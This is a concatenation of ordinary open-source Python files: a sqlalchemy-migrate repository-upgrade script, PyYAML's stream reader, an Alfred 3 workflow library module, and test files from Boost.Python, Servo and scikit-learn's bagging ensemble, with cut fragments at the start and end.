print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
tanayseven/Voix
|
refs/heads/master
|
flask/lib/python2.7/site-packages/migrate/versioning/migrate_repository.py
|
120
|
"""
Script to migrate repository from sqlalchemy <= 0.4.4 to the new
repository schema. This shouldn't use any other migrate modules, so
that it can work in any version.
"""
import os
import sys
import logging
log = logging.getLogger(__name__)
def usage():
"""Gives usage information."""
print """Usage: %(prog)s repository-to-migrate
Upgrade your repository to the new flat format.
NOTE: You should probably make a backup before running this.
""" % {'prog': sys.argv[0]}
sys.exit(1)
def delete_file(filepath):
"""Deletes a file and prints a message."""
log.info('Deleting file: %s' % filepath)
os.remove(filepath)
def move_file(src, tgt):
"""Moves a file and prints a message."""
log.info('Moving file %s to %s' % (src, tgt))
if os.path.exists(tgt):
raise Exception(
'Cannot move file %s because target %s already exists' % \
(src, tgt))
os.rename(src, tgt)
def delete_directory(dirpath):
"""Delete a directory and print a message."""
log.info('Deleting directory: %s' % dirpath)
os.rmdir(dirpath)
def migrate_repository(repos):
"""Does the actual migration to the new repository format."""
log.info('Migrating repository at: %s to new format' % repos)
versions = '%s/versions' % repos
dirs = os.listdir(versions)
# Only use int's in list.
numdirs = [int(dirname) for dirname in dirs if dirname.isdigit()]
numdirs.sort() # Sort list.
for dirname in numdirs:
origdir = '%s/%s' % (versions, dirname)
log.info('Working on directory: %s' % origdir)
files = os.listdir(origdir)
files.sort()
for filename in files:
# Delete compiled Python files.
if filename.endswith('.pyc') or filename.endswith('.pyo'):
delete_file('%s/%s' % (origdir, filename))
# Delete empty __init__.py files.
origfile = '%s/__init__.py' % origdir
if os.path.exists(origfile) and len(open(origfile).read()) == 0:
delete_file(origfile)
# Move sql upgrade scripts.
if filename.endswith('.sql'):
version, dbms, operation = filename.split('.', 3)[0:3]
origfile = '%s/%s' % (origdir, filename)
# For instance: 2.postgres.upgrade.sql ->
# 002_postgres_upgrade.sql
tgtfile = '%s/%03d_%s_%s.sql' % (
versions, int(version), dbms, operation)
move_file(origfile, tgtfile)
# Move Python upgrade script.
pyfile = '%s.py' % dirname
pyfilepath = '%s/%s' % (origdir, pyfile)
if os.path.exists(pyfilepath):
tgtfile = '%s/%03d.py' % (versions, int(dirname))
move_file(pyfilepath, tgtfile)
# Try to remove directory. Will fail if it's not empty.
delete_directory(origdir)
def main():
"""Main function to be called when using this script."""
if len(sys.argv) != 2:
usage()
migrate_repository(sys.argv[1])
if __name__ == '__main__':
main()
|
Maccimo/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyConvertToFStringIntentionTest/percentOperatorSimpleDictConstructorCall.py
|
31
|
'%(foo)d %(bar)s' % dict(foo=.25, bar='spam'.upper())
|
cris-iisc/mpc-primitives
|
refs/heads/master
|
crislib/libscapi/lib/boost_1_64_0/libs/python/test/pickle4.py
|
20
|
# Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
r'''>>> import pickle4_ext
>>> import pickle
>>> def world_getinitargs(self):
... return (self.get_country(),)
>>> pickle4_ext.world.__getinitargs__ = world_getinitargs
>>> pickle4_ext.world.__module__
'pickle4_ext'
>>> pickle4_ext.world.__safe_for_unpickling__
1
>>> pickle4_ext.world.__name__
'world'
>>> pickle4_ext.world('Hello').__reduce__()
(<class 'pickle4_ext.world'>, ('Hello',))
>>> wd = pickle4_ext.world('California')
>>> pstr = pickle.dumps(wd)
>>> wl = pickle.loads(pstr)
>>> print(wd.greet())
Hello from California!
>>> print(wl.greet())
Hello from California!
'''
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print("running...")
import sys
status = run()[0]
if (status == 0): print("Done.")
sys.exit(status)
|
dimagol/trex-core
|
refs/heads/master
|
scripts/external_libs/pyyaml-3.11/python3/yaml/reader.py
|
272
|
# This module contains abstractions for the input stream. You don't have to
# look further, there is no pretty code here.
#
# We define two classes here.
#
# Mark(source, line, column)
# It's just a record and its only use is producing nice error messages.
# Parser does not use it for any other purposes.
#
# Reader(source, data)
# Reader determines the encoding of `data` and converts it to unicode.
# Reader provides the following methods and attributes:
# reader.peek(length=1) - return the next `length` characters
# reader.forward(length=1) - move the current position forward by `length` characters.
# reader.index - the number of the current character.
# reader.line, reader.column - the line and the column of the current character.
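# A minimal usage sketch (illustrative values):
#   reader = Reader('abc')   # a str source is used directly
#   reader.peek()            # -> 'a' (does not advance)
#   reader.forward(2)        # advance two characters
#   reader.peek()            # -> 'c'; reader.index == 2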
__all__ = ['Reader', 'ReaderError']
from .error import YAMLError, Mark
import codecs, re
class ReaderError(YAMLError):
def __init__(self, name, position, character, encoding, reason):
self.name = name
self.character = character
self.position = position
self.encoding = encoding
self.reason = reason
def __str__(self):
if isinstance(self.character, bytes):
return "'%s' codec can't decode byte #x%02x: %s\n" \
" in \"%s\", position %d" \
% (self.encoding, ord(self.character), self.reason,
self.name, self.position)
else:
return "unacceptable character #x%04x: %s\n" \
" in \"%s\", position %d" \
% (self.character, self.reason,
self.name, self.position)
class Reader(object):
# Reader:
# - determines the data encoding and converts it to a unicode string,
# - checks if characters are in allowed range,
# - adds '\0' to the end.
# Reader accepts
# - a `bytes` object,
# - a `str` object,
# - a file-like object with its `read` method returning `str`,
# - a file-like object with its `read` method returning `unicode`.
# Yeah, it's ugly and slow.
def __init__(self, stream):
self.name = None
self.stream = None
self.stream_pointer = 0
self.eof = True
self.buffer = ''
self.pointer = 0
self.raw_buffer = None
self.raw_decode = None
self.encoding = None
self.index = 0
self.line = 0
self.column = 0
if isinstance(stream, str):
self.name = "<unicode string>"
self.check_printable(stream)
self.buffer = stream+'\0'
elif isinstance(stream, bytes):
self.name = "<byte string>"
self.raw_buffer = stream
self.determine_encoding()
else:
self.stream = stream
self.name = getattr(stream, 'name', "<file>")
self.eof = False
self.raw_buffer = None
self.determine_encoding()
def peek(self, index=0):
try:
return self.buffer[self.pointer+index]
except IndexError:
self.update(index+1)
return self.buffer[self.pointer+index]
def prefix(self, length=1):
if self.pointer+length >= len(self.buffer):
self.update(length)
return self.buffer[self.pointer:self.pointer+length]
def forward(self, length=1):
if self.pointer+length+1 >= len(self.buffer):
self.update(length+1)
while length:
ch = self.buffer[self.pointer]
self.pointer += 1
self.index += 1
if ch in '\n\x85\u2028\u2029' \
or (ch == '\r' and self.buffer[self.pointer] != '\n'):
self.line += 1
self.column = 0
elif ch != '\uFEFF':
self.column += 1
length -= 1
def get_mark(self):
if self.stream is None:
return Mark(self.name, self.index, self.line, self.column,
self.buffer, self.pointer)
else:
return Mark(self.name, self.index, self.line, self.column,
None, None)
def determine_encoding(self):
while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):
self.update_raw()
if isinstance(self.raw_buffer, bytes):
if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):
self.raw_decode = codecs.utf_16_le_decode
self.encoding = 'utf-16-le'
elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):
self.raw_decode = codecs.utf_16_be_decode
self.encoding = 'utf-16-be'
else:
self.raw_decode = codecs.utf_8_decode
self.encoding = 'utf-8'
self.update(1)
NON_PRINTABLE = re.compile('[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\uD7FF\uE000-\uFFFD]')
def check_printable(self, data):
match = self.NON_PRINTABLE.search(data)
if match:
character = match.group()
position = self.index+(len(self.buffer)-self.pointer)+match.start()
raise ReaderError(self.name, position, ord(character),
'unicode', "special characters are not allowed")
def update(self, length):
if self.raw_buffer is None:
return
self.buffer = self.buffer[self.pointer:]
self.pointer = 0
while len(self.buffer) < length:
if not self.eof:
self.update_raw()
if self.raw_decode is not None:
try:
data, converted = self.raw_decode(self.raw_buffer,
'strict', self.eof)
except UnicodeDecodeError as exc:
character = self.raw_buffer[exc.start]
if self.stream is not None:
position = self.stream_pointer-len(self.raw_buffer)+exc.start
else:
position = exc.start
raise ReaderError(self.name, position, character,
exc.encoding, exc.reason)
else:
data = self.raw_buffer
converted = len(data)
self.check_printable(data)
self.buffer += data
self.raw_buffer = self.raw_buffer[converted:]
if self.eof:
self.buffer += '\0'
self.raw_buffer = None
break
def update_raw(self, size=4096):
data = self.stream.read(size)
if self.raw_buffer is None:
self.raw_buffer = data
else:
self.raw_buffer += data
self.stream_pointer += len(data)
if not data:
self.eof = True
#try:
# import psyco
# psyco.bind(Reader)
#except ImportError:
# pass
|
dzbarsky/servo
|
refs/heads/master
|
python/mach/mach/test/test_logger.py
|
128
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, unicode_literals
import logging
import time
import unittest
from mach.logging import StructuredHumanFormatter
from mozunit import main
class DummyLogger(logging.Logger):
def __init__(self, cb):
logging.Logger.__init__(self, 'test')
self._cb = cb
def handle(self, record):
self._cb(record)
class TestStructuredHumanFormatter(unittest.TestCase):
def test_non_ascii_logging(self):
# Ensures the formatter doesn't choke when non-ASCII characters are
# present in printed parameters.
formatter = StructuredHumanFormatter(time.time())
def on_record(record):
result = formatter.format(record)
relevant = result[9:]
self.assertEqual(relevant, 'Test: s\xe9curit\xe9')
logger = DummyLogger(on_record)
value = 's\xe9curit\xe9'
logger.log(logging.INFO, 'Test: {utf}',
extra={'action': 'action', 'params': {'utf': value}})
if __name__ == '__main__':
main()
|
ggenikus/cld
|
refs/heads/master
|
src/libs/workflow/workflow3.py
|
3
|
# encoding: utf-8
#
# Copyright (c) 2016 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2016-06-25
#
"""
:class:`Workflow3` supports Alfred 3's new features.
It is an Alfred 3-only version of :class:`~workflow.workflow.Workflow`.
It supports setting :ref:`workflow-variables` and
:class:`the more advanced modifiers <Modifier>` supported by Alfred 3.
In order for the feedback mechanism to work correctly, it's important
to create :class:`Item3` and :class:`Modifier` objects via the
:meth:`Workflow3.add_item()` and :meth:`Item3.add_modifier()` methods
respectively. If you instantiate :class:`Item3` or :class:`Modifier`
objects directly, the current :class:`~workflow.workflow3.Workflow3`
object won't be aware of them, and they won't be sent to Alfred when
you call :meth:`~workflow.workflow3.Workflow3.send_feedback()`.
"""
from __future__ import print_function, unicode_literals, absolute_import
import json
import os
import sys
from .workflow import Workflow
class Variables(dict):
"""Workflow variables for Run Script actions.
.. versionadded: 1.26
This class allows you to set workflow variables from
Run Script actions.
It is a subclass of `dict`.
>>> v = Variables(username='deanishe', password='hunter2')
>>> v.arg = u'output value'
>>> print(v)
Attributes:
arg (unicode): Output value (``{query}``).
config (dict): Configuration for downstream workflow element.
"""
def __init__(self, arg=None, **variables):
"""Create a new `Variables` object.
Args:
arg (unicode, optional): Main output/``{query}``.
**variables: Workflow variables to set.
"""
self.arg = arg
self.config = {}
super(Variables, self).__init__(**variables)
@property
def obj(self):
"""Return ``alfredworkflow`` `dict`."""
o = {}
if self:
d2 = {}
for k, v in self.items():
d2[k] = v
o['variables'] = d2
if self.config:
o['config'] = self.config
if self.arg is not None:
o['arg'] = self.arg
return {'alfredworkflow': o}
def __unicode__(self):
"""Convert to ``alfredworkflow`` JSON object.
Returns:
unicode: ``alfredworkflow`` JSON object
"""
if not self and not self.config:
if self.arg:
return self.arg
else:
return u''
return json.dumps(self.obj)
def __str__(self):
"""Convert to ``alfredworkflow`` JSON object.
Returns:
str: UTF-8 encoded ``alfredworkflow`` JSON object
"""
return unicode(self).encode('utf-8')
class Modifier(object):
"""Modify ``Item3`` values for when specified modifier keys are pressed.
Valid modifiers (i.e. values for ``key``) are:
* cmd
* alt
* shift
* ctrl
* fn
Attributes:
arg (unicode): Arg to pass to following action.
key (unicode): Modifier key (see above).
subtitle (unicode): Override item subtitle.
valid (bool): Override item validity.
variables (dict): Workflow variables set by this modifier.
"""
def __init__(self, key, subtitle=None, arg=None, valid=None):
"""Create a new :class:`Modifier`.
You probably don't want to use this class directly, but rather
use :meth:`Item3.add_modifier()` to add modifiers to results.
Args:
key (unicode): Modifier key, e.g. ``"cmd"``, ``"alt"`` etc.
subtitle (unicode, optional): Override default subtitle.
arg (unicode, optional): Argument to pass for this modifier.
valid (bool, optional): Override item's validity.
"""
self.key = key
self.subtitle = subtitle
self.arg = arg
self.valid = valid
self.config = {}
self.variables = {}
def setvar(self, name, value):
"""Set a workflow variable for this Item.
Args:
name (unicode): Name of variable.
value (unicode): Value of variable.
"""
self.variables[name] = value
def getvar(self, name, default=None):
"""Return value of workflow variable for ``name`` or ``default``.
Args:
name (unicode): Variable name.
default (None, optional): Value to return if variable is unset.
Returns:
unicode or ``default``: Value of variable if set or ``default``.
"""
return self.variables.get(name, default)
@property
def obj(self):
"""Modifier formatted for JSON serialization for Alfred 3.
Returns:
dict: Modifier for serializing to JSON.
"""
o = {}
if self.subtitle is not None:
o['subtitle'] = self.subtitle
if self.arg is not None:
o['arg'] = self.arg
if self.valid is not None:
o['valid'] = self.valid
# Variables and config
if self.variables or self.config:
d = {}
if self.variables:
d['variables'] = self.variables
if self.config:
d['config'] = self.config
if self.arg is not None:
d['arg'] = self.arg
o['arg'] = json.dumps({'alfredworkflow': d})
return o
class Item3(object):
"""Represents a feedback item for Alfred 3.
Generates Alfred-compliant JSON for a single item.
You probably shouldn't use this class directly, but via
:meth:`Workflow3.add_item`. See :meth:`~Workflow3.add_item`
for details of arguments.
"""
def __init__(self, title, subtitle='', arg=None, autocomplete=None,
valid=False, uid=None, icon=None, icontype=None,
type=None, largetext=None, copytext=None, quicklookurl=None):
"""Use same arguments as for :meth:`Workflow.add_item`.
Argument ``subtitle_modifiers`` is not supported.
"""
self.title = title
self.subtitle = subtitle
self.arg = arg
self.autocomplete = autocomplete
self.valid = valid
self.uid = uid
self.icon = icon
self.icontype = icontype
self.type = type
self.quicklookurl = quicklookurl
self.largetext = largetext
self.copytext = copytext
self.modifiers = {}
self.config = {}
self.variables = {}
def setvar(self, name, value):
"""Set a workflow variable for this Item.
Args:
name (unicode): Name of variable.
value (unicode): Value of variable.
"""
self.variables[name] = value
def getvar(self, name, default=None):
"""Return value of workflow variable for ``name`` or ``default``.
Args:
name (unicode): Variable name.
default (None, optional): Value to return if variable is unset.
Returns:
unicode or ``default``: Value of variable if set or ``default``.
"""
return self.variables.get(name, default)
def add_modifier(self, key, subtitle=None, arg=None, valid=None):
"""Add alternative values for a modifier key.
Args:
key (unicode): Modifier key, e.g. ``"cmd"`` or ``"alt"``
subtitle (unicode, optional): Override item subtitle.
arg (unicode, optional): Input for following action.
valid (bool, optional): Override item validity.
Returns:
Modifier: Configured :class:`Modifier`.
"""
mod = Modifier(key, subtitle, arg, valid)
for k in self.variables:
mod.setvar(k, self.variables[k])
self.modifiers[key] = mod
return mod
@property
def obj(self):
"""Item formatted for JSON serialization.
Returns:
dict: Data suitable for Alfred 3 feedback.
"""
# Required values
o = {'title': self.title,
'subtitle': self.subtitle,
'valid': self.valid}
icon = {}
# Optional values
# arg & variables
v = Variables(self.arg, **self.variables)
v.config = self.config
arg = unicode(v)
if arg:
o['arg'] = arg
if self.autocomplete is not None:
o['autocomplete'] = self.autocomplete
if self.uid is not None:
o['uid'] = self.uid
if self.type is not None:
o['type'] = self.type
if self.quicklookurl is not None:
o['quicklookurl'] = self.quicklookurl
# Largetype and copytext
text = self._text()
if text:
o['text'] = text
icon = self._icon()
if icon:
o['icon'] = icon
# Modifiers
mods = self._modifiers()
if mods:
o['mods'] = mods
return o
def _icon(self):
"""Return `icon` object for item.
Returns:
dict: Mapping for item `icon` (may be empty).
"""
icon = {}
if self.icon is not None:
icon['path'] = self.icon
if self.icontype is not None:
icon['type'] = self.icontype
return icon
def _text(self):
"""Return `largetext` and `copytext` object for item.
Returns:
dict: `text` mapping (may be empty)
"""
text = {}
if self.largetext is not None:
text['largetype'] = self.largetext
if self.copytext is not None:
text['copy'] = self.copytext
return text
def _modifiers(self):
"""Build `mods` dictionary for JSON feedback.
Returns:
dict: Modifier mapping or `None`.
"""
if self.modifiers:
mods = {}
for k, mod in self.modifiers.items():
mods[k] = mod.obj
return mods
return None
class Workflow3(Workflow):
"""Workflow class that generates Alfred 3 feedback.
Attributes:
item_class (class): Class used to generate feedback items.
variables (dict): Top level workflow variables.
"""
item_class = Item3
def __init__(self, **kwargs):
"""Create a new :class:`Workflow3` object.
See :class:`~workflow.workflow.Workflow` for documentation.
"""
Workflow.__init__(self, **kwargs)
self.variables = {}
self._rerun = 0
self._session_id = None
@property
def _default_cachedir(self):
"""Alfred 3's default cache directory."""
return os.path.join(
os.path.expanduser(
'~/Library/Caches/com.runningwithcrayons.Alfred-3/'
'Workflow Data/'),
self.bundleid)
@property
def _default_datadir(self):
"""Alfred 3's default data directory."""
return os.path.join(os.path.expanduser(
'~/Library/Application Support/Alfred 3/Workflow Data/'),
self.bundleid)
@property
def rerun(self):
"""How often (in seconds) Alfred should re-run the Script Filter."""
return self._rerun
@rerun.setter
def rerun(self, seconds):
"""Interval at which Alfred should re-run the Script Filter.
Args:
seconds (int): Interval between runs.
"""
self._rerun = seconds
@property
def session_id(self):
"""A unique session ID every time the user uses the workflow.
.. versionadded:: 1.25
The session ID persists while the user is using this workflow.
It expires when the user runs a different workflow or closes
Alfred.
"""
if not self._session_id:
sid = os.getenv('_WF_SESSION_ID')
if not sid:
from uuid import uuid4
sid = uuid4().hex
self.setvar('_WF_SESSION_ID', sid)
self._session_id = sid
return self._session_id
def setvar(self, name, value):
"""Set a "global" workflow variable.
These variables are always passed to downstream workflow objects.
If you have set :attr:`rerun`, these variables are also passed
back to the script when Alfred runs it again.
Args:
name (unicode): Name of variable.
value (unicode): Value of variable.
"""
self.variables[name] = value
def getvar(self, name, default=None):
"""Return value of workflow variable for ``name`` or ``default``.
Args:
name (unicode): Variable name.
default (None, optional): Value to return if variable is unset.
Returns:
unicode or ``default``: Value of variable if set or ``default``.
"""
return self.variables.get(name, default)
def add_item(self, title, subtitle='', arg=None, autocomplete=None,
valid=False, uid=None, icon=None, icontype=None,
type=None, largetext=None, copytext=None, quicklookurl=None):
"""Add an item to be output to Alfred.
See :meth:`~workflow.workflow.Workflow.add_item` for the main
documentation.
The key difference is that this method does not support the
``modifier_subtitles`` argument. Use the :meth:`~Item3.add_modifier()`
        method on the returned item instead.
Returns:
Item3: Alfred feedback item.
"""
item = self.item_class(title, subtitle, arg,
autocomplete, valid, uid, icon, icontype, type,
largetext, copytext, quicklookurl)
self._items.append(item)
return item
def _mk_session_name(self, name):
"""New cache name/key based on session ID."""
return '_wfsess-{0}-{1}'.format(self.session_id, name)
def cache_data(self, name, data, session=False):
"""Cache API with session-scoped expiry.
.. versionadded:: 1.25
Args:
name (str): Cache key
data (object): Data to cache
session (bool, optional): Whether to scope the cache
to the current session.
``name`` and ``data`` are as for the
:meth:`~workflow.workflow.Workflow.cache_data` on
:class:`~workflow.workflow.Workflow`.
If ``session`` is ``True``, the ``name`` variable is prefixed
with :attr:`session_id`.
"""
if session:
name = self._mk_session_name(name)
return super(Workflow3, self).cache_data(name, data)
def cached_data(self, name, data_func=None, max_age=60, session=False):
"""Cache API with session-scoped expiry.
.. versionadded:: 1.25
Args:
name (str): Cache key
data_func (callable): Callable that returns fresh data. It
is called if the cache has expired or doesn't exist.
max_age (int): Maximum allowable age of cache in seconds.
session (bool, optional): Whether to scope the cache
to the current session.
``name``, ``data_func`` and ``max_age`` are as for the
:meth:`~workflow.workflow.Workflow.cached_data` on
:class:`~workflow.workflow.Workflow`.
If ``session`` is ``True``, the ``name`` variable is prefixed
with :attr:`session_id`.
"""
if session:
name = self._mk_session_name(name)
return super(Workflow3, self).cached_data(name, data_func, max_age)
def clear_session_cache(self):
"""Remove *all* session data from the cache.
.. versionadded:: 1.25
"""
def _is_session_file(filename):
return filename.startswith('_wfsess-')
self.clear_cache(_is_session_file)
@property
def obj(self):
"""Feedback formatted for JSON serialization.
Returns:
dict: Data suitable for Alfred 3 feedback.
"""
items = []
for item in self._items:
items.append(item.obj)
o = {'items': items}
if self.variables:
o['variables'] = self.variables
if self.rerun:
o['rerun'] = self.rerun
return o
def send_feedback(self):
"""Print stored items to console/Alfred as JSON."""
json.dump(self.obj, sys.stdout)
sys.stdout.flush()
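# Minimal usage sketch (illustrative only; the import path and workflow setup
# are assumptions, not part of this file):
#
#     from workflow import Workflow3
#
#     def main(wf):
#         wf.setvar('fruit', 'banana')          # top-level workflow variable
#         it = wf.add_item(u'Title', u'Subtitle', arg=u'output', valid=True)
#         it.add_modifier('cmd', subtitle=u'Alternate action', arg=u'other')
#         wf.cache_data('results', [1, 2, 3], session=True)  # session-scoped cache
#         wf.send_feedback()
#
#     if __name__ == '__main__':
#         wf = Workflow3()
#         wf.run(main)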
|
nikitasingh981/scikit-learn
|
refs/heads/master
|
sklearn/ensemble/tests/test_bagging.py
|
43
|
"""
Testing for the bagging ensemble module (sklearn.ensemble.bagging).
"""
# Author: Gilles Louppe
# License: BSD 3 clause
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_warns
from sklearn.utils.testing import assert_warns_message
from sklearn.dummy import DummyClassifier, DummyRegressor
from sklearn.model_selection import GridSearchCV, ParameterGrid
from sklearn.ensemble import BaggingClassifier, BaggingRegressor
from sklearn.linear_model import Perceptron, LogisticRegression
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.svm import SVC, SVR
from sklearn.pipeline import make_pipeline
from sklearn.feature_selection import SelectKBest
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_boston, load_iris, make_hastie_10_2
from sklearn.utils import check_random_state
from scipy.sparse import csc_matrix, csr_matrix
rng = check_random_state(0)
# also load the iris dataset
# and randomly permute it
iris = load_iris()
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_classification():
# Check classification for various parameter settings.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
grid = ParameterGrid({"max_samples": [0.5, 1.0],
"max_features": [1, 2, 4],
"bootstrap": [True, False],
"bootstrap_features": [True, False]})
for base_estimator in [None,
DummyClassifier(),
Perceptron(),
DecisionTreeClassifier(),
KNeighborsClassifier(),
SVC()]:
for params in grid:
BaggingClassifier(base_estimator=base_estimator,
random_state=rng,
**params).fit(X_train, y_train).predict(X_test)
def test_sparse_classification():
# Check classification for various parameter settings on sparse input.
class CustomSVC(SVC):
"""SVC variant that records the nature of the training set"""
def fit(self, X, y):
super(CustomSVC, self).fit(X, y)
self.data_type_ = type(X)
return self
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
parameter_sets = [
{"max_samples": 0.5,
"max_features": 2,
"bootstrap": True,
"bootstrap_features": True},
{"max_samples": 1.0,
"max_features": 4,
"bootstrap": True,
"bootstrap_features": True},
{"max_features": 2,
"bootstrap": False,
"bootstrap_features": True},
{"max_samples": 0.5,
"bootstrap": True,
"bootstrap_features": False},
]
for sparse_format in [csc_matrix, csr_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
for params in parameter_sets:
for f in ['predict', 'predict_proba', 'predict_log_proba', 'decision_function']:
# Trained on sparse format
sparse_classifier = BaggingClassifier(
base_estimator=CustomSVC(decision_function_shape='ovr'),
random_state=1,
**params
).fit(X_train_sparse, y_train)
sparse_results = getattr(sparse_classifier, f)(X_test_sparse)
# Trained on dense format
dense_classifier = BaggingClassifier(
base_estimator=CustomSVC(decision_function_shape='ovr'),
random_state=1,
**params
).fit(X_train, y_train)
dense_results = getattr(dense_classifier, f)(X_test)
assert_array_equal(sparse_results, dense_results)
sparse_type = type(X_train_sparse)
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert all([t == sparse_type for t in types])
def test_regression():
# Check regression for various parameter settings.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data[:50],
boston.target[:50],
random_state=rng)
grid = ParameterGrid({"max_samples": [0.5, 1.0],
"max_features": [0.5, 1.0],
"bootstrap": [True, False],
"bootstrap_features": [True, False]})
for base_estimator in [None,
DummyRegressor(),
DecisionTreeRegressor(),
KNeighborsRegressor(),
SVR()]:
for params in grid:
BaggingRegressor(base_estimator=base_estimator,
random_state=rng,
**params).fit(X_train, y_train).predict(X_test)
def test_sparse_regression():
# Check regression for various parameter settings on sparse input.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data[:50],
boston.target[:50],
random_state=rng)
class CustomSVR(SVR):
"""SVC variant that records the nature of the training set"""
def fit(self, X, y):
super(CustomSVR, self).fit(X, y)
self.data_type_ = type(X)
return self
parameter_sets = [
{"max_samples": 0.5,
"max_features": 2,
"bootstrap": True,
"bootstrap_features": True},
{"max_samples": 1.0,
"max_features": 4,
"bootstrap": True,
"bootstrap_features": True},
{"max_features": 2,
"bootstrap": False,
"bootstrap_features": True},
{"max_samples": 0.5,
"bootstrap": True,
"bootstrap_features": False},
]
for sparse_format in [csc_matrix, csr_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
for params in parameter_sets:
# Trained on sparse format
sparse_classifier = BaggingRegressor(
base_estimator=CustomSVR(),
random_state=1,
**params
).fit(X_train_sparse, y_train)
sparse_results = sparse_classifier.predict(X_test_sparse)
# Trained on dense format
dense_results = BaggingRegressor(
base_estimator=CustomSVR(),
random_state=1,
**params
).fit(X_train, y_train).predict(X_test)
sparse_type = type(X_train_sparse)
types = [i.data_type_ for i in sparse_classifier.estimators_]
            assert_array_equal(sparse_results, dense_results)
            assert all([t == sparse_type for t in types])
def test_bootstrap_samples():
# Test that bootstrapping samples generate non-perfect base estimators.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
base_estimator = DecisionTreeRegressor().fit(X_train, y_train)
# without bootstrap, all trees are perfect on the training set
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_samples=1.0,
bootstrap=False,
random_state=rng).fit(X_train, y_train)
assert_equal(base_estimator.score(X_train, y_train),
ensemble.score(X_train, y_train))
# with bootstrap, trees are no longer perfect on the training set
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_samples=1.0,
bootstrap=True,
random_state=rng).fit(X_train, y_train)
assert_greater(base_estimator.score(X_train, y_train),
ensemble.score(X_train, y_train))
def test_bootstrap_features():
# Test that bootstrapping features may generate duplicate features.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_features=1.0,
bootstrap_features=False,
random_state=rng).fit(X_train, y_train)
for features in ensemble.estimators_features_:
assert_equal(boston.data.shape[1], np.unique(features).shape[0])
ensemble = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
max_features=1.0,
bootstrap_features=True,
random_state=rng).fit(X_train, y_train)
for features in ensemble.estimators_features_:
assert_greater(boston.data.shape[1], np.unique(features).shape[0])
def test_probability():
# Predict probabilities.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
with np.errstate(divide="ignore", invalid="ignore"):
# Normal case
ensemble = BaggingClassifier(base_estimator=DecisionTreeClassifier(),
random_state=rng).fit(X_train, y_train)
assert_array_almost_equal(np.sum(ensemble.predict_proba(X_test),
axis=1),
np.ones(len(X_test)))
assert_array_almost_equal(ensemble.predict_proba(X_test),
np.exp(ensemble.predict_log_proba(X_test)))
# Degenerate case, where some classes are missing
ensemble = BaggingClassifier(base_estimator=LogisticRegression(),
random_state=rng,
max_samples=5).fit(X_train, y_train)
assert_array_almost_equal(np.sum(ensemble.predict_proba(X_test),
axis=1),
np.ones(len(X_test)))
assert_array_almost_equal(ensemble.predict_proba(X_test),
np.exp(ensemble.predict_log_proba(X_test)))
def test_oob_score_classification():
# Check that oob prediction is a good estimation of the generalization
# error.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
for base_estimator in [DecisionTreeClassifier(), SVC()]:
clf = BaggingClassifier(base_estimator=base_estimator,
n_estimators=100,
bootstrap=True,
oob_score=True,
random_state=rng).fit(X_train, y_train)
test_score = clf.score(X_test, y_test)
assert_less(abs(test_score - clf.oob_score_), 0.1)
# Test with few estimators
assert_warns(UserWarning,
BaggingClassifier(base_estimator=base_estimator,
n_estimators=1,
bootstrap=True,
oob_score=True,
random_state=rng).fit,
X_train,
y_train)
def test_oob_score_regression():
# Check that oob prediction is a good estimation of the generalization
# error.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
clf = BaggingRegressor(base_estimator=DecisionTreeRegressor(),
n_estimators=50,
bootstrap=True,
oob_score=True,
random_state=rng).fit(X_train, y_train)
test_score = clf.score(X_test, y_test)
assert_less(abs(test_score - clf.oob_score_), 0.1)
# Test with few estimators
